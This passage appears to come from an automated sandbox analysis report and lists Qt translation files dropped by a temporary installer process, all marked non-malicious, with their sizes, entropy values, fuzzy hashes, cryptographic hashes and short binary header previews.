Entropy (8bit):4.695402138614251
Encrypted:false
SSDEEP:384:ZP5z0nT4x6kjXVkllEmXd6+TfM1nO6Pgv+n4kOby4WvJ:UT4MkbV2EUd6+cnO6YGn4M
MD5:B1DC69B7C86A8BEBB7B758BB8B241535
SHA1:B75C4FC69FAC889067A836AB620285984476B7D9
SHA-256:ADC549E5F4771AE234DB87847B9797C0217581B69C5A06A254877F19D225058F
SHA-512:62B262F6E79BC8D3A40506FB3CE6DE6528FCFD9C8D62C033584CEF56A0F70ECEAEA4E9B82951639593303AADC88E7758E069B8DE419C2539FC1E75A52F9BE1FD
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):28416
Entropy (8bit):4.745555315840919
Encrypted:false
SSDEEP:768:G1rjeSTVZbKagGwTFToL3RvDWI7zfoiOp3cHWyQ68rZPFaEvRVaib:OHfKagGwTFTWdDWI7boiOp3cHW3P1RVB
MD5:A8F9FC9108D8E44F2111BC7AC63C9F75
SHA1:1692FD262A44FD674D4E48644CE22C175AF0C865
SHA-256:A10D0CF6FC8DD20290BD11529DC1DB210D69B05FE518F2248D6D720AF8495470
SHA-512:99C008F4CE997384D024390A896275BCD10B53D8725F1E9CB2628AB119B1381DABC5189C60C85A817C52AF33AC3D0E2D190373C9F7F8707A6FDD508E61C4C2B9
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):27444
Entropy (8bit):4.672755214321859
Encrypted:false
SSDEEP:384:l3POS+SsVKz36+e26v7powzg+fhSsbiGr:hORlVKz3Ze2y7pV00
MD5:5323FC9E0D0110FE16F649B91167E604
SHA1:88DBC51B2F91B23DC75A2EB1A64EC8FFE05C7FDB
SHA-256:660389BE673840C90CC9F93C9BE9A16E721F9A60C2934A9468C7307044C890E1
SHA-512:526655F5663509FBB545E67F643CEEB2D5FE558FBF02466AC58733ADEE8BDF8996B3FCB9CCBB860E49FADEF3B4E27D4C127FD4F3AD6FDCB8EEE27DC993CA21BC
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):28141
Entropy (8bit):4.629516521520014
Encrypted:false
SSDEEP:384:XAbel+QUett3u72zMsS3z9K1A/TW/2bgH85qwDLEOghX5iNK+H:qQUetjTS3z9GAq/QcSqsLEM
MD5:08AB1F12E7ED69CA493109B02A920C27
SHA1:CD6433F48E1FA82747C57AE254E046BDEDC8A429
SHA-256:943EB81FB1A7D11FC3CAA8D7E5E9DEC1C4940983D516F2B9612B68AF07E4CA44
SHA-512:C00A5FF0C467F7A52AA837BD09234A4E4A959F6CE4D5EED773AC2FB7BAC9914A9748A54A41CA2269C240B5AF0644FB7B7A29286DA43D21B209E85D0E3713EEA0
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):23348
Entropy (8bit):5.657948878761793
Encrypted:false
SSDEEP:384:UmHzyMSIlmOvULptM3LeJi1od5LIBD6rNqHUIKM:UmHtllmOvULrM3LU7ZIBV
MD5:EFD6D076AAD193007E77BFA1BB46E3DA
SHA1:92B02FDC48FCA4BD721E5171FA9B66DA049F1CEB
SHA-256:2AB7B0A9745CD011AD92F1EC49E1C8729A1401DEB23D1CC9180458DB386ED8F5
SHA-512:11297FD0CB3C14EBD24A01289E24535C5E414534DCE43EEB87D2B5AFCE3B0335A9D32E4B042FF642D837FB5FA5FE4CB34AF732DCD50D8F43344D7DB592BEF925
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):22516
Entropy (8bit):5.64342773223904
Encrypted:false
SSDEEP:384:PojOWvws/b7HxRs55zmHpec+6V26K9lhjzy2aZ:wyWvwsT7RRs55zop7+82O
MD5:C09D31E3E2A0F6B673F8B26AA49B8E9E
SHA1:829B459D3642E84D0F0E0AE30D16203C583B1A88
SHA-256:30B8FD1F756F508C00F1B27051016F58B35A9F09490C6B1376B23E37F8EC8288
SHA-512:DA20D507F6AFE26A3EAD31C9AD2C5CDA174B8BCD907E8CB77D29F894DEE25A3567FC565C1D9155FDDDE9C2CD38AFDD1B119EC39918F0049330D4C4BE701C8884
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):28545
Entropy (8bit):4.714189994601161
Encrypted:false
SSDEEP:384:GURDrpuVMlrYXZpq/VKVACvlcuO+YLDeeeIY1P5Cd+wQeBx6HaGnsFQFR:GUDrpuylriTWVKVAACu4fFa1P54+wQN
MD5:2AADC93C38DBB7E1D048B05B63133217
SHA1:66BBDB0EF40D01A0AECC0FA5219B464EE08CBB37
SHA-256:A1DB9CBE9D30A6FC2800C0B5AC7F92E9DDDF3B6C742E0EEC892C758F66413C93
SHA-512:63D4998822C2A9D679C07A4C172C12B6EEF93E8B7853C146689CC1F5316B67AF25661F9B4F65D0B167035CB825116B60B950C2A3E2995BAF5FCF6494AB02F404
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):27649
Entropy (8bit):4.760709648438812
Encrypted:false
SSDEEP:384:lDAmfKQkdX+kxl/Pnaz/ewJ5T5XTo5vJRaZ/igxcx9:7S/dOkx1Pnaz2wpeWOn
MD5:C41CF1ECCEF6EB2CB6BBAF02A383BC28
SHA1:B2E5D8721D04232F7219AC00496379C14576E33D
SHA-256:61FD26C0CCFB205E3FA2E1F530FFE210F10A17ABEBDDA7DC085E404CEAB9FD69
SHA-512:341FBEB45CFE794FE76E033383111BB404DAF630746996F7B7CEA49DE9953A93C75E332C50E37513639D5D521C4BAD2D37F44F5E94AA215221BBB1D148FEE4A2
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):26887
Entropy (8bit):4.711499642917058
Encrypted:false
SSDEEP:768:NJLP6Bk0ZQt9u0+UXuxtIc4JLDTcH6NcBq:NVyp+tU0+FxWc+Dq62o
MD5:D0C083D4760D44DB80A0AEDE7862D5EC
SHA1:155B7B067596D105B0BC4471BD654F1D9B720D20
SHA-256:186D5FAF9ED383C64DBA358B559D2E62ED7D60A24AECA570403086950E381176
SHA-512:B47BA5D333C6334AC9C1987C66C4EC51C11A2EC9EF8865B1BC334656E3629900D094888A9939ED7D08F1E609E683EDC69212D467626A705ADBFB2DE60000D5A0
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):28029
Entropy (8bit):4.645006029092153
Encrypted:false
SSDEEP:384:nsoeTpwn8BLKep+1uYLGPlUMpitDd0FoTGv8QAyEDPQRBHYerHcgDOIq0IDbn8:nsoeTpXr+KiBd0qTayPQRdBv
MD5:1DCBBF653BCB4D127D902EAB60CBB42A
SHA1:BDC0ACD9FEE35B3F1446210A45C5B20ED9987F8A
SHA-256:F1C9FB8580866B3066DD4BA9A559F3161B4E3240831A8439F9720B12B40FA010
SHA-512:9A85094294FB5884BDD548E7BEDFCB97760ABE61ED76AAC5EF2E7AF6127EBEC33D1F16FF3DB7FC59FB294C12F3E78E2547BABB4A992864B13CC3BAC7DB0C8F22
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):28357
Entropy (8bit):4.7436866012778625
Encrypted:false
SSDEEP:384:5ph1weyWuzmrQaIBqQKp8GweGs4G4fc/xrRFkTMNa1xsEG07LXjXu:5pQeyWuzmMvBqQQ8GfGsQfcJUTM7S6
MD5:45864510329D981D80C616641357FEFF
SHA1:C4EB7D6D98D29656FA2DE8E9923750556408E865
SHA-256:3A3F6762C19E934B6FBE1EF38E0D68A96E8A3B7B27E196655CFA8C257529A947
SHA-512:93E671353C5C4E2F39656EE64758556BDF2FFA6185F4A4991C12B432870C830D1BACB772FD0CD0F71AF7E088D363AC1475BBA2FBCE6797D992D01BA407915D83
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):28217
Entropy (8bit):4.655652026218731
Encrypted:false
SSDEEP:768:NPgRUervlMMfgdhrAnEL326U24PonYBmC:N4RUetCHjHeQU
MD5:C8AF2228F3F331635F1E4E55E1C9FD32
SHA1:9AD8E149DDA58030C3D4104D653DCEC0AD534F9E
SHA-256:16F95D32D808EA146F522FA230D65A635892CC54DF8014D40A9DD7774F234EDF
SHA-512:DAD7F44C031D159500E39DC27E7F8B67165EA04EBBEEC71BECEF57CCEC66B85F0E26B6D319F3D4305CD42D95480CE03C0DAFBCA2B1C9EEE78A2FE3699606BDF0
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):28132
Entropy (8bit):4.6803756692053184
Encrypted:false
SSDEEP:384:n3mvi1M9EsRNmRi55piCisjj7zBR0nD/NoK3ZNvIgN7lQQlddoAtrHquy+G:WHEsRh97FR0nDFo0ZNDWQlduR
MD5:2DB27B87481EDE8D4FE8C92431A5C5AC
SHA1:0FFF475A4C88E59550B83CC1F8BBC1F3A28BFC38
SHA-256:A3881D35EE46708B0A84D512E96981D7DF563A3C547416376B7BEAF874A3946B
SHA-512:B235CA5CADB26C9A5225CB968BB75B874A8ECAFEC3E72303FE92499A357FB7D1894C4352E6CABDDC833C9552643D2E58A67EEDF22780573674AA0D19DC84615A
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):28292
Entropy (8bit):5.300323619618019
Encrypted:false
SSDEEP:384:sPSD57jf9U4FM1xLvsxmE2Ly36cmKe+4sEQI+feD3/gXTQWym6:sPc7jf9U4FMbLymE2Ly36cmBAbI+fel
MD5:70059C7809B9DB196A6A58588536B7D6
SHA1:6C7C41EEEB0E59A75C0E7CA09B34E8AC9C4B8244
SHA-256:7AFB5C93E0CCE72EAFBAB5B3CE0D82E1102A750EFE9A9F079D47ADB67F60D4A5
SHA-512:EB4D5EE0E47975CF6FDDAB81AA86670233F385503983B4A8C60031C4BFA5C30BB02DB261CB9FDE6CF09686D749C9DE961294A1E00FD47330EB7A0EE9DCF3DED3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........ZZ...;...p...;.......;.......;..!....;..D....O..]8...[..X....^..0....^..T...(5......G.......H,..Q...K...@...N:......V...FA.._...^X......)|......Q....y..RA.......a..............Z2...t..++...t..R....t..\......A....j......5t......@...C...H5..Z...f...0.......F........s...........~..3....`..8|...e..\M......\s......... =...G..*.y...b.*.y...%.*.%..%X.*.0..%..+.......+.......+......+......+....''.G.... ..G....+..H0...\..Hw9.....Hw9.....I....)..J6....:.J6......J6......J6...Jo.LD......L.b..]..M.S..BL.R.......V....0..Wi...[..W.T.....Z.|..S..[f3..Wf.gc......w0K..I0..H...&;......]....T......."..5....~..8... d..Gg...T../...2...........[b......a..9.E..AF.L.#..dQ.M$o.....e.......l8...7....^..J...I...........D4......T}......[...>...A..>......3..0E..l...L.......;..5.l..`..AV...(..y....Yi...0..UN......T7......Z...tb..6................a......U.......>d......P6.(....T..1V...*..R....2..W.<..aI.f.~.."x......5n..1....9...^..7....5...1..........c..G..;6...b..q.J..Q...I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27607
                                                                                                                                                                                                  Entropy (8bit):4.7796924802259895
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:fDrEdeVx7lvwfFTCGmlTDZOqKvO2HMfhm:fDrEdolofFWGmlTDZOVGSIhm
                                                                                                                                                                                                  MD5:3AB470D0817DA632BCDA59AB7C24C08B
                                                                                                                                                                                                  SHA1:C2A643FF68C75A0573ED6A506427F3233848453C
                                                                                                                                                                                                  SHA-256:8E66FB8FB713DD256C72D5E007E041A6CD435A9A76406B9C345DFD0E3476A351
                                                                                                                                                                                                  SHA-512:A1B3A9F7AD04C9154EDF417FA3A6D80EEBCDA3A11E07588C0CEBE33A687A5B5985AD546DB4AC4CED02E1608295219807C464971CAA8F3F00ADD6E0794062F128
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........W....;...4...;...-...;.......;.. ....;..Bv...O..Z....[..Vr...^../I...^..RJ..(5...]..G.......H,..O*..K...>...N:......V...C..._...[.......(Z......OY...y..O........9..............W....t..*....t..PV...t..Z7.....?....j......5t...o..@...A...H5..X]..f.../s......Dr...................~..28...`..6z...e..Y.......Y.......... =...E..*.y...p.*.y.....*.%..$B.*.0..$m.+.......+.....T.+......+......+....&..G.......G....*}.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....n.J6...H7.LD......L.b..Zh.M.S..@..R.......V..../..Wi...YZ.W.T.....Z.|..Q..[f3..T..gc......w0K..F...H...%!......[N...T......."..4 ...~..6... d..D....T..-...2....1......X......._..9.E..?8.L.#..a..M$o.....e.....`.l8...5....^..Hp..I....`......A.......Q.......X...>...3..>......3../...l...I.......9..5.l..^#.AV...'..y....V....0..R.......Q.......X'..tb..4.......................S3......<b......M..(....Rz.1V...(..R....1=.W.<..^..f.~..!.......3...1........^..5#...5...m......<...c..ER.;6...`/.q.J..N...I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28344
                                                                                                                                                                                                  Entropy (8bit):4.687451491727224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qjVfhQdGPdlCzQt1OY8L7HP7xpLnR0l7sY1m1ZDxE0FTlHwLGW6F0:qjthQoPdlkQt1O1Hv7xpLnul7xcFxFr0
                                                                                                                                                                                                  MD5:950906410E936E0BB5F109082105D7B6
                                                                                                                                                                                                  SHA1:C2B7B811141FDAC2DBC712095759E3C68CE77565
                                                                                                                                                                                                  SHA-256:F0DB0B2040454AE4CF27A7398C28E4C32CD0151D30AD1ED59ACC8C8C021335CF
                                                                                                                                                                                                  SHA-512:FC7A0D8B6E9D1E82E8596CCF57889B55B455D3A8036D78FB190BEDC724BC28588F68A295C42AEBBEC1623F7AE78ADACD94F2791F4008874C0B7CFFD2845181AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........ZB...;.......;.......;.......;..!}...;..Dp...O..]....[..X....^..07...^..T...(5......G.......H,..Q...K...@...N:...h..V...E..._...^h......)Z......Q....y..RS......................Z....t..+....t..R....t..\......A....j......5t......@...C...H5..Z...f...0g......F................!...~..3J...`..8"...e..\3......\].......H. =...G..*.y.....*.y...].*.%..%6.*.0..%g.+.....U.+.......+......+......+....'..G.... ..G....+m.H0...\..Hw9.....Hw9.....I....(..J6......J6......J6......J6...JY.LD......L.b..\..M.S..B&.R.......V....0..Wi...[..W.T.....Z.|..S..[f3..Wd.gc....F.w0K..I...H...&.......]....T......."..5....~..7... d..G....T......2....M......[L......a..9.E..A..L.#..d..M$o.....e.......l8...79...^..J...I....f......C.......Ti......[...>...]..>......3../...l...L ......:..5.l..`..AV...(..y....YQ...0..UH......T%......Z...tb..68.......!..............U.......>>......PB.(....T..1V...)..R....2=.W.<..aE.f.~.."x......5...1....I...^..6....5...=..........c..Gr.;6...b..q.J..Q8..I....M..I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27834
                                                                                                                                                                                                  Entropy (8bit):4.7072414399522335
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:yMPle26Dx1urq+h3DHLkcg4iYOUCfjAjQ6Jhws0WVE:yMPle22x4qkTHLkx4iYOU4jAjQl
                                                                                                                                                                                                  MD5:A3264DCBED0CEFC981230E4CCADF8807
                                                                                                                                                                                                  SHA1:0A3E5FFA3013E7D8101C3D69ED5E02589792C6A4
                                                                                                                                                                                                  SHA-256:6D2B6C8C8636AF5E7236AB5045DF6AD1239FD8D84A7EC285D3B4733539F9EE03
                                                                                                                                                                                                  SHA-512:7E5AF283C121B00DCF9FAB52DFC447F711F7B437D3B70903139EF268311A9F7978988D45EF4583023E1DBE6A7FC8FD8D06A8C7628E4D75CF49C6A15610BB59C3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........X....;.......;.......;...A...;..!....;..C(...O..[....[..Wp...^../....^..S<..(5......G....$..H,..P*..K...?v..N:......V...D..._...\.......(.......PS...y..P.......................X....t..*m...t..Q<...t..[G.....@^...j......5t......@...BC..H5..Yg..f.../.......E\...................~..2....`..7*...e..Z.......Z........6. =...Fo.*.y.....*.y...].*.%..$..*.0..$..+.....G.+.......+....x.+......+....&..G.... ..G....*..H0...[..Hw9...w.Hw9...Y.I....(b.J6....P.J6......J6......J6...H..LD......L.b..[x.M.S..@..R.....P.V..../..Wi...Z`.W.T.....Z.|..R..[f3..U..gc......w0K..G...H...%.......\T...T...)..."..4....~..6... d..E....T......2....E......Y......._..9.E..?..L.#..b..M$o.....e.......l8...6I...^..I&..I....f......Bp......R.......Y...>...]..>......3../7..l...J.......9..5.l..^..AV...('.y....W....0..S.......R.......Y+..tb..5B......................T)......=.......N..(....Sp.1V...)P.R....1..W.<.._u.f.~..".......4...1........^..5....5..............c..F$.;6...a..q.J..O...I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27099
                                                                                                                                                                                                  Entropy (8bit):4.717079738585517
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:VkPmHTZjXg+G4WYwtwYd5y+0hsnvrS+OrcNwNTbSHI8crD1aVVrcyVbTLiOG:V1TZjXg63qL4+usnve1ANMTV8crK8
                                                                                                                                                                                                  MD5:58ACBFB46226E1833250D5F5A7CE7D6E
                                                                                                                                                                                                  SHA1:5711848C2E2E5D5144B5F965A0F856611773A7F4
                                                                                                                                                                                                  SHA-256:7117B0D25A9C04FBEE7F8D5D9D3B2D0E5C1A02831B70D735EC24D9B056753A74
                                                                                                                                                                                                  SHA-512:DA918A21E0A58BB2CB84087F2B96C209A5C050DF658F1B66329489423A9AACAB6B66514863E14477A5FF8D0CBA654567E4865FE6777484029511C57BF0D9DD6A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........V....;...<...;.......;.......;.. ....;..A6...O..X....[..T....^.......^..P...(5...e..G.......H,..M...K...=...N:...z..V...B..._...Y.......'.......M....y..N=.......q..............U....t..)....t..N....t..Xo.....>....j......5t......@...@U..H5..V...f...........C@.......u...........~..1h...`..5|...e..W.......X.......... =...DI.*.y.....*.y.....*.%..#..*.0..#..+.......+.....B.+....B.+....v.+....%..G.......G....)..H0...XA.Hw9.....Hw9.....I....'..J6......J6......J6....P.J6...F..LD......L.b..X..M.S..>..R.......V.......Wi...W..W.T...s.Z.|..Ok.[f3..S<.gc......w0K..Ep..H...$.......Y^...T......."..3....~..5... d..C....T..-+..2...........W.......]..9.E..>..L.#.._..M$o...|.e.....P.l8...4....^..G...I....D......@.......PY......V...>......>......3...;..l...Ht......7..5.l..\#.AV...'M.y....U....0..Q ......P.......V]..tb..3.......................Q{......;V......LZ.(....P..1V...(l.R....0{.W.<..\..f.~..!\......2...1........^..45...5...Y......2...c..D..;6...^9.q.J..M$..I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26514
                                                                                                                                                                                                  Entropy (8bit):5.365287004508335
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:nUzD+5WAlXcVhAB44F7JjbP2HvOqwtew5Mg+Xl+UWZhS4vr7:nMGWAlXcV+m4F7JjbP2P9wxMg+X4f9
                                                                                                                                                                                                  MD5:31966D909B8293307AC3545ACA55CD13
                                                                                                                                                                                                  SHA1:1B49E43C0109445BA5068E2ED8422CB308D99B12
                                                                                                                                                                                                  SHA-256:81B17400011DC60FD3CDBEDA6F52E3E848B0A8C754703CD32E4DBEB82A77C14B
                                                                                                                                                                                                  SHA-512:7CF39F060267A043DEAA52C7A1F7DBA00EB24957264C349D9322BD1E8506151A566E26FAB9B45ED5FEB7140EBE05A8AC89062DAF5D2FA4AE4845735036694EE8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........S....;...^...;.......;.......;.......;..>....O..VL...[..R&...^..,C...^..M...(5......G.......H,..K...K...;(..N:...x..V...?..._...W.......&.......KG...y..K................\......Sb...t..'....t..L&...t..U......;....j......5t......@...=...H5..T#..f...,g......@........M...........~../....`..3*...e..Um......U.......... =...A..*.y.....*.y...9.*.%.."..*.0.."7.+.....7.+.......+....f.+......+....#..G.......G....'..H0...U..Hw9...5.Hw9.....I....%..J6....0.J6......J6....b.J6...D..LD....|.L.b..V..M.S..<n.R.......V....,..Wi...U..W.T...S.Z.|..L..[f3..P..gc......w0K..B...H...".......W....T...s..."..0....~..2... d..A....T..*...2...........T.......Z..9.E..;..L.#..]g.M$o.....e.......l8...2Q...^..DL..I....0......=.......M.......TK..>......>...^..3..+...l...E.......5..5.l..Y..AV...%o.y....R....0..Nz......Mo......S...tb..1`...............m......N.......8.......I..(....N..1V...&|.R.....#.W.<..Zc.f.~...p......0j..1........^..1....5...O......h...c..An.;6...[..q.J..J...I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27282
                                                                                                                                                                                                  Entropy (8bit):4.801156368722529
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZUOMiBL2+9VpzlQLm8QKHsbWSBSj4a/sqS4uCRam1bUvmRF:boP64jf+4uCRR
                                                                                                                                                                                                  MD5:4DD48C8DA1964B46D4D972244288081A
                                                                                                                                                                                                  SHA1:1A9802C9FA07BF41FAF924E2C2DE6A9D6E6EFFC5
                                                                                                                                                                                                  SHA-256:572E3D6ABD3A7BE7F4F464DDBD53A6AE2657E8DC0427B59D9A942D8A04833323
                                                                                                                                                                                                  SHA-512:59A873E28746DA37458C3C37EC8B7E7F303E57FA6EADC3A2DCAB8456DCA625EA4A96D05B83DA434A92FE3CFB37578564B0279A9E27E85D6E8ED3EF4E7E4021E9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........V....;.......;...w...;...S...;.. ....;..A....O..Y\...[..UD...^...G...^..QP..(5......G.......H,..N...K...=...N:......V...Ck.._...Z.......'.......N....y..O................j......Vr...t..)G...t..O....t..Y......>....j...!..5t...)..@...@...H5..W/..f....m......D2.......c.......S...~..1&...`..5....e..X.......X........,. =...E=.*.y...P.*.y...-.*.%..#..*.0..#..+.......+.......+......+......+....%_.G.....5.G....)..H0...X..Hw9...C.Hw9...[.I....'d.J6......J6....D.J6......J6...G..LD......L.b..Y4.M.S..?H.R.....<.V.......Wi...X..W.T.....Z.|..PK.[f3..S..gc....v.w0K..FZ..H...$u......Z....T......."..2....~..52.. d..D....T..,...2...........W.......]..9.E..>Z.L.#..`e.M$o.....e.......l8...4....^..G...I....D......@.......Q.......WS..>......>...~..3..-...l...IR......7..5.l..\..AV...'!.y....U....0..Q.......P.......V...tb..3................c......R#......;z......M8.(....Q|.1V...(<.R....0%.W.<..]m.f.~.. .......2...1........^..4....5..........|...c..D..;6..._..q.J..N...I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28836
                                                                                                                                                                                                  Entropy (8bit):5.274937745581086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:evIxSKa3n9xd9wBClaVMxIswLfg0x6WcX:eG+X7YIUVMYk
                                                                                                                                                                                                  MD5:EE64BC556D9E554E5122531BBA368240
                                                                                                                                                                                                  SHA1:C691C2D832157EF9FD50F0D2C5B91EA9B6934979
                                                                                                                                                                                                  SHA-256:11D722019F26DAEF74AF7EAE33823B4625D4EBBC33352D5EFAC85D19B2BA0658
                                                                                                                                                                                                  SHA-512:23BE3849BE62BEE12E645E01E05D45ACCB2D575F15D50643FC5658F37C6143E66BE2A80010E030C78059357F7E45FB9D9EF2E1625A59505BD74C99CA2EA749BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........\....;.......;...1...;.. G...;.."!...;..F....O.._....[..[J...^..1q...^..V...(5......G.......H,..S...K...B...N:......V...G..._...`.......*F......T....y..Tg......................\....t..+....t..T....t.._;.....C....j.. ...5t......@...E...H5..]_..f...1.......H....................~..4....`..:....e..^.......^.......... =...I..*.y.....*.y.....*.%..&..*.0..&1.+.......+.......+....H.+....h.+....'..G....!-.G....,W.H0..._..Hw9.....Hw9.....I....)..J6....\.J6......J6....r.J6...Lq.LD......L.b.._j.M.S..Df.R.......V....1..Wi...^Z.W.T...I.Z.|..U..[f3..Y..gc....F.w0K..J...H...&.......`D...T......."..6....~..9... d..I....T../...2...........].......c..9.E..C^.L.#..f].M$o.....e.....:.l8...9!...^..L...I....N......E.......V.......]...>...E..>......3..1...l...N.......<..5.l..b..AV...)..y....[....0..Wh......VS......]'..tb..7.......................W.......@.......Rt.(....W..1V...*..R....3..W.<..cW.f.~..#.......6z..1........^..8A...5...i......L...c..Il.;6...d..q.J..SP..I....!..I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27204
                                                                                                                                                                                                  Entropy (8bit):5.005345988323232
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OpTFOkqnz8B1NM9aQ3T07mnagn7UMHJEt5jTlAXSHjcvHrP:ORFInz8BbM9aQ3w7gaMJk0
                                                                                                                                                                                                  MD5:53839022420E21292B81995749C5BCBD
                                                                                                                                                                                                  SHA1:D050A1FD64DCA4D57F9C15B71838811F3C5CF51B
                                                                                                                                                                                                  SHA-256:44900BCBB56194E2153DD1F0963DC5947C817C2A33D3A55E39A3DCDE1FDEB66A
                                                                                                                                                                                                  SHA-512:6D93BB2E3C193F21EC86456694B447899C21CC3CCE606307E9EAB3F8A8F0D92DE75A167C94F20F8AC45BFEE5F7E9192257D5F17AF46DF44598DE77E6FB5E008B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Vp...;...`...;.......;.......;.. ....;..A....O..Y4...[..U ...^.......^..Q...(5......G.......H,..N...K...=...N:......V...B..._...Zj......((......NE...y..N................2......VH...t..)....t..O6...t..X......>....j......5t......@...@...H5..W...f...........C........q...........~..1~...`..5....e..XW......X.......... =...D..*.y.....*.y.....*.%..$X.*.0..$..+.......+.....J.+....R.+......+....&..G.......G....*..H0...X..Hw9.....Hw9.....I....'..J6....0.J6......J6....Z.J6...G..LD......L.b..Y..M.S..?T.R.......V..../..Wi...W..W.T.....Z.|..O..[f3..S..gc......w0K..E...H...%1......Y....T......."..3D...~..5`.. d..D1...T..-K..2...........Wv......]..9.E..>f.L.#..`'.M$o.....e.....f.l8...5....^..GL..I....B......@.......P.......W5..>...'..>......3......l...H.......8R.5.l..\..AV...'..y....U....0..Q.......P.......V...tb..3.......................Q.......;.......L..(....Q>.1V...(..R....0..W.<..]..f.~..!.......2...1........^..4i...5...u......H...c..Dr.;6...^..q.J..M...I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21282
                                                                                                                                                                                                  Entropy (8bit):5.593895866111406
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
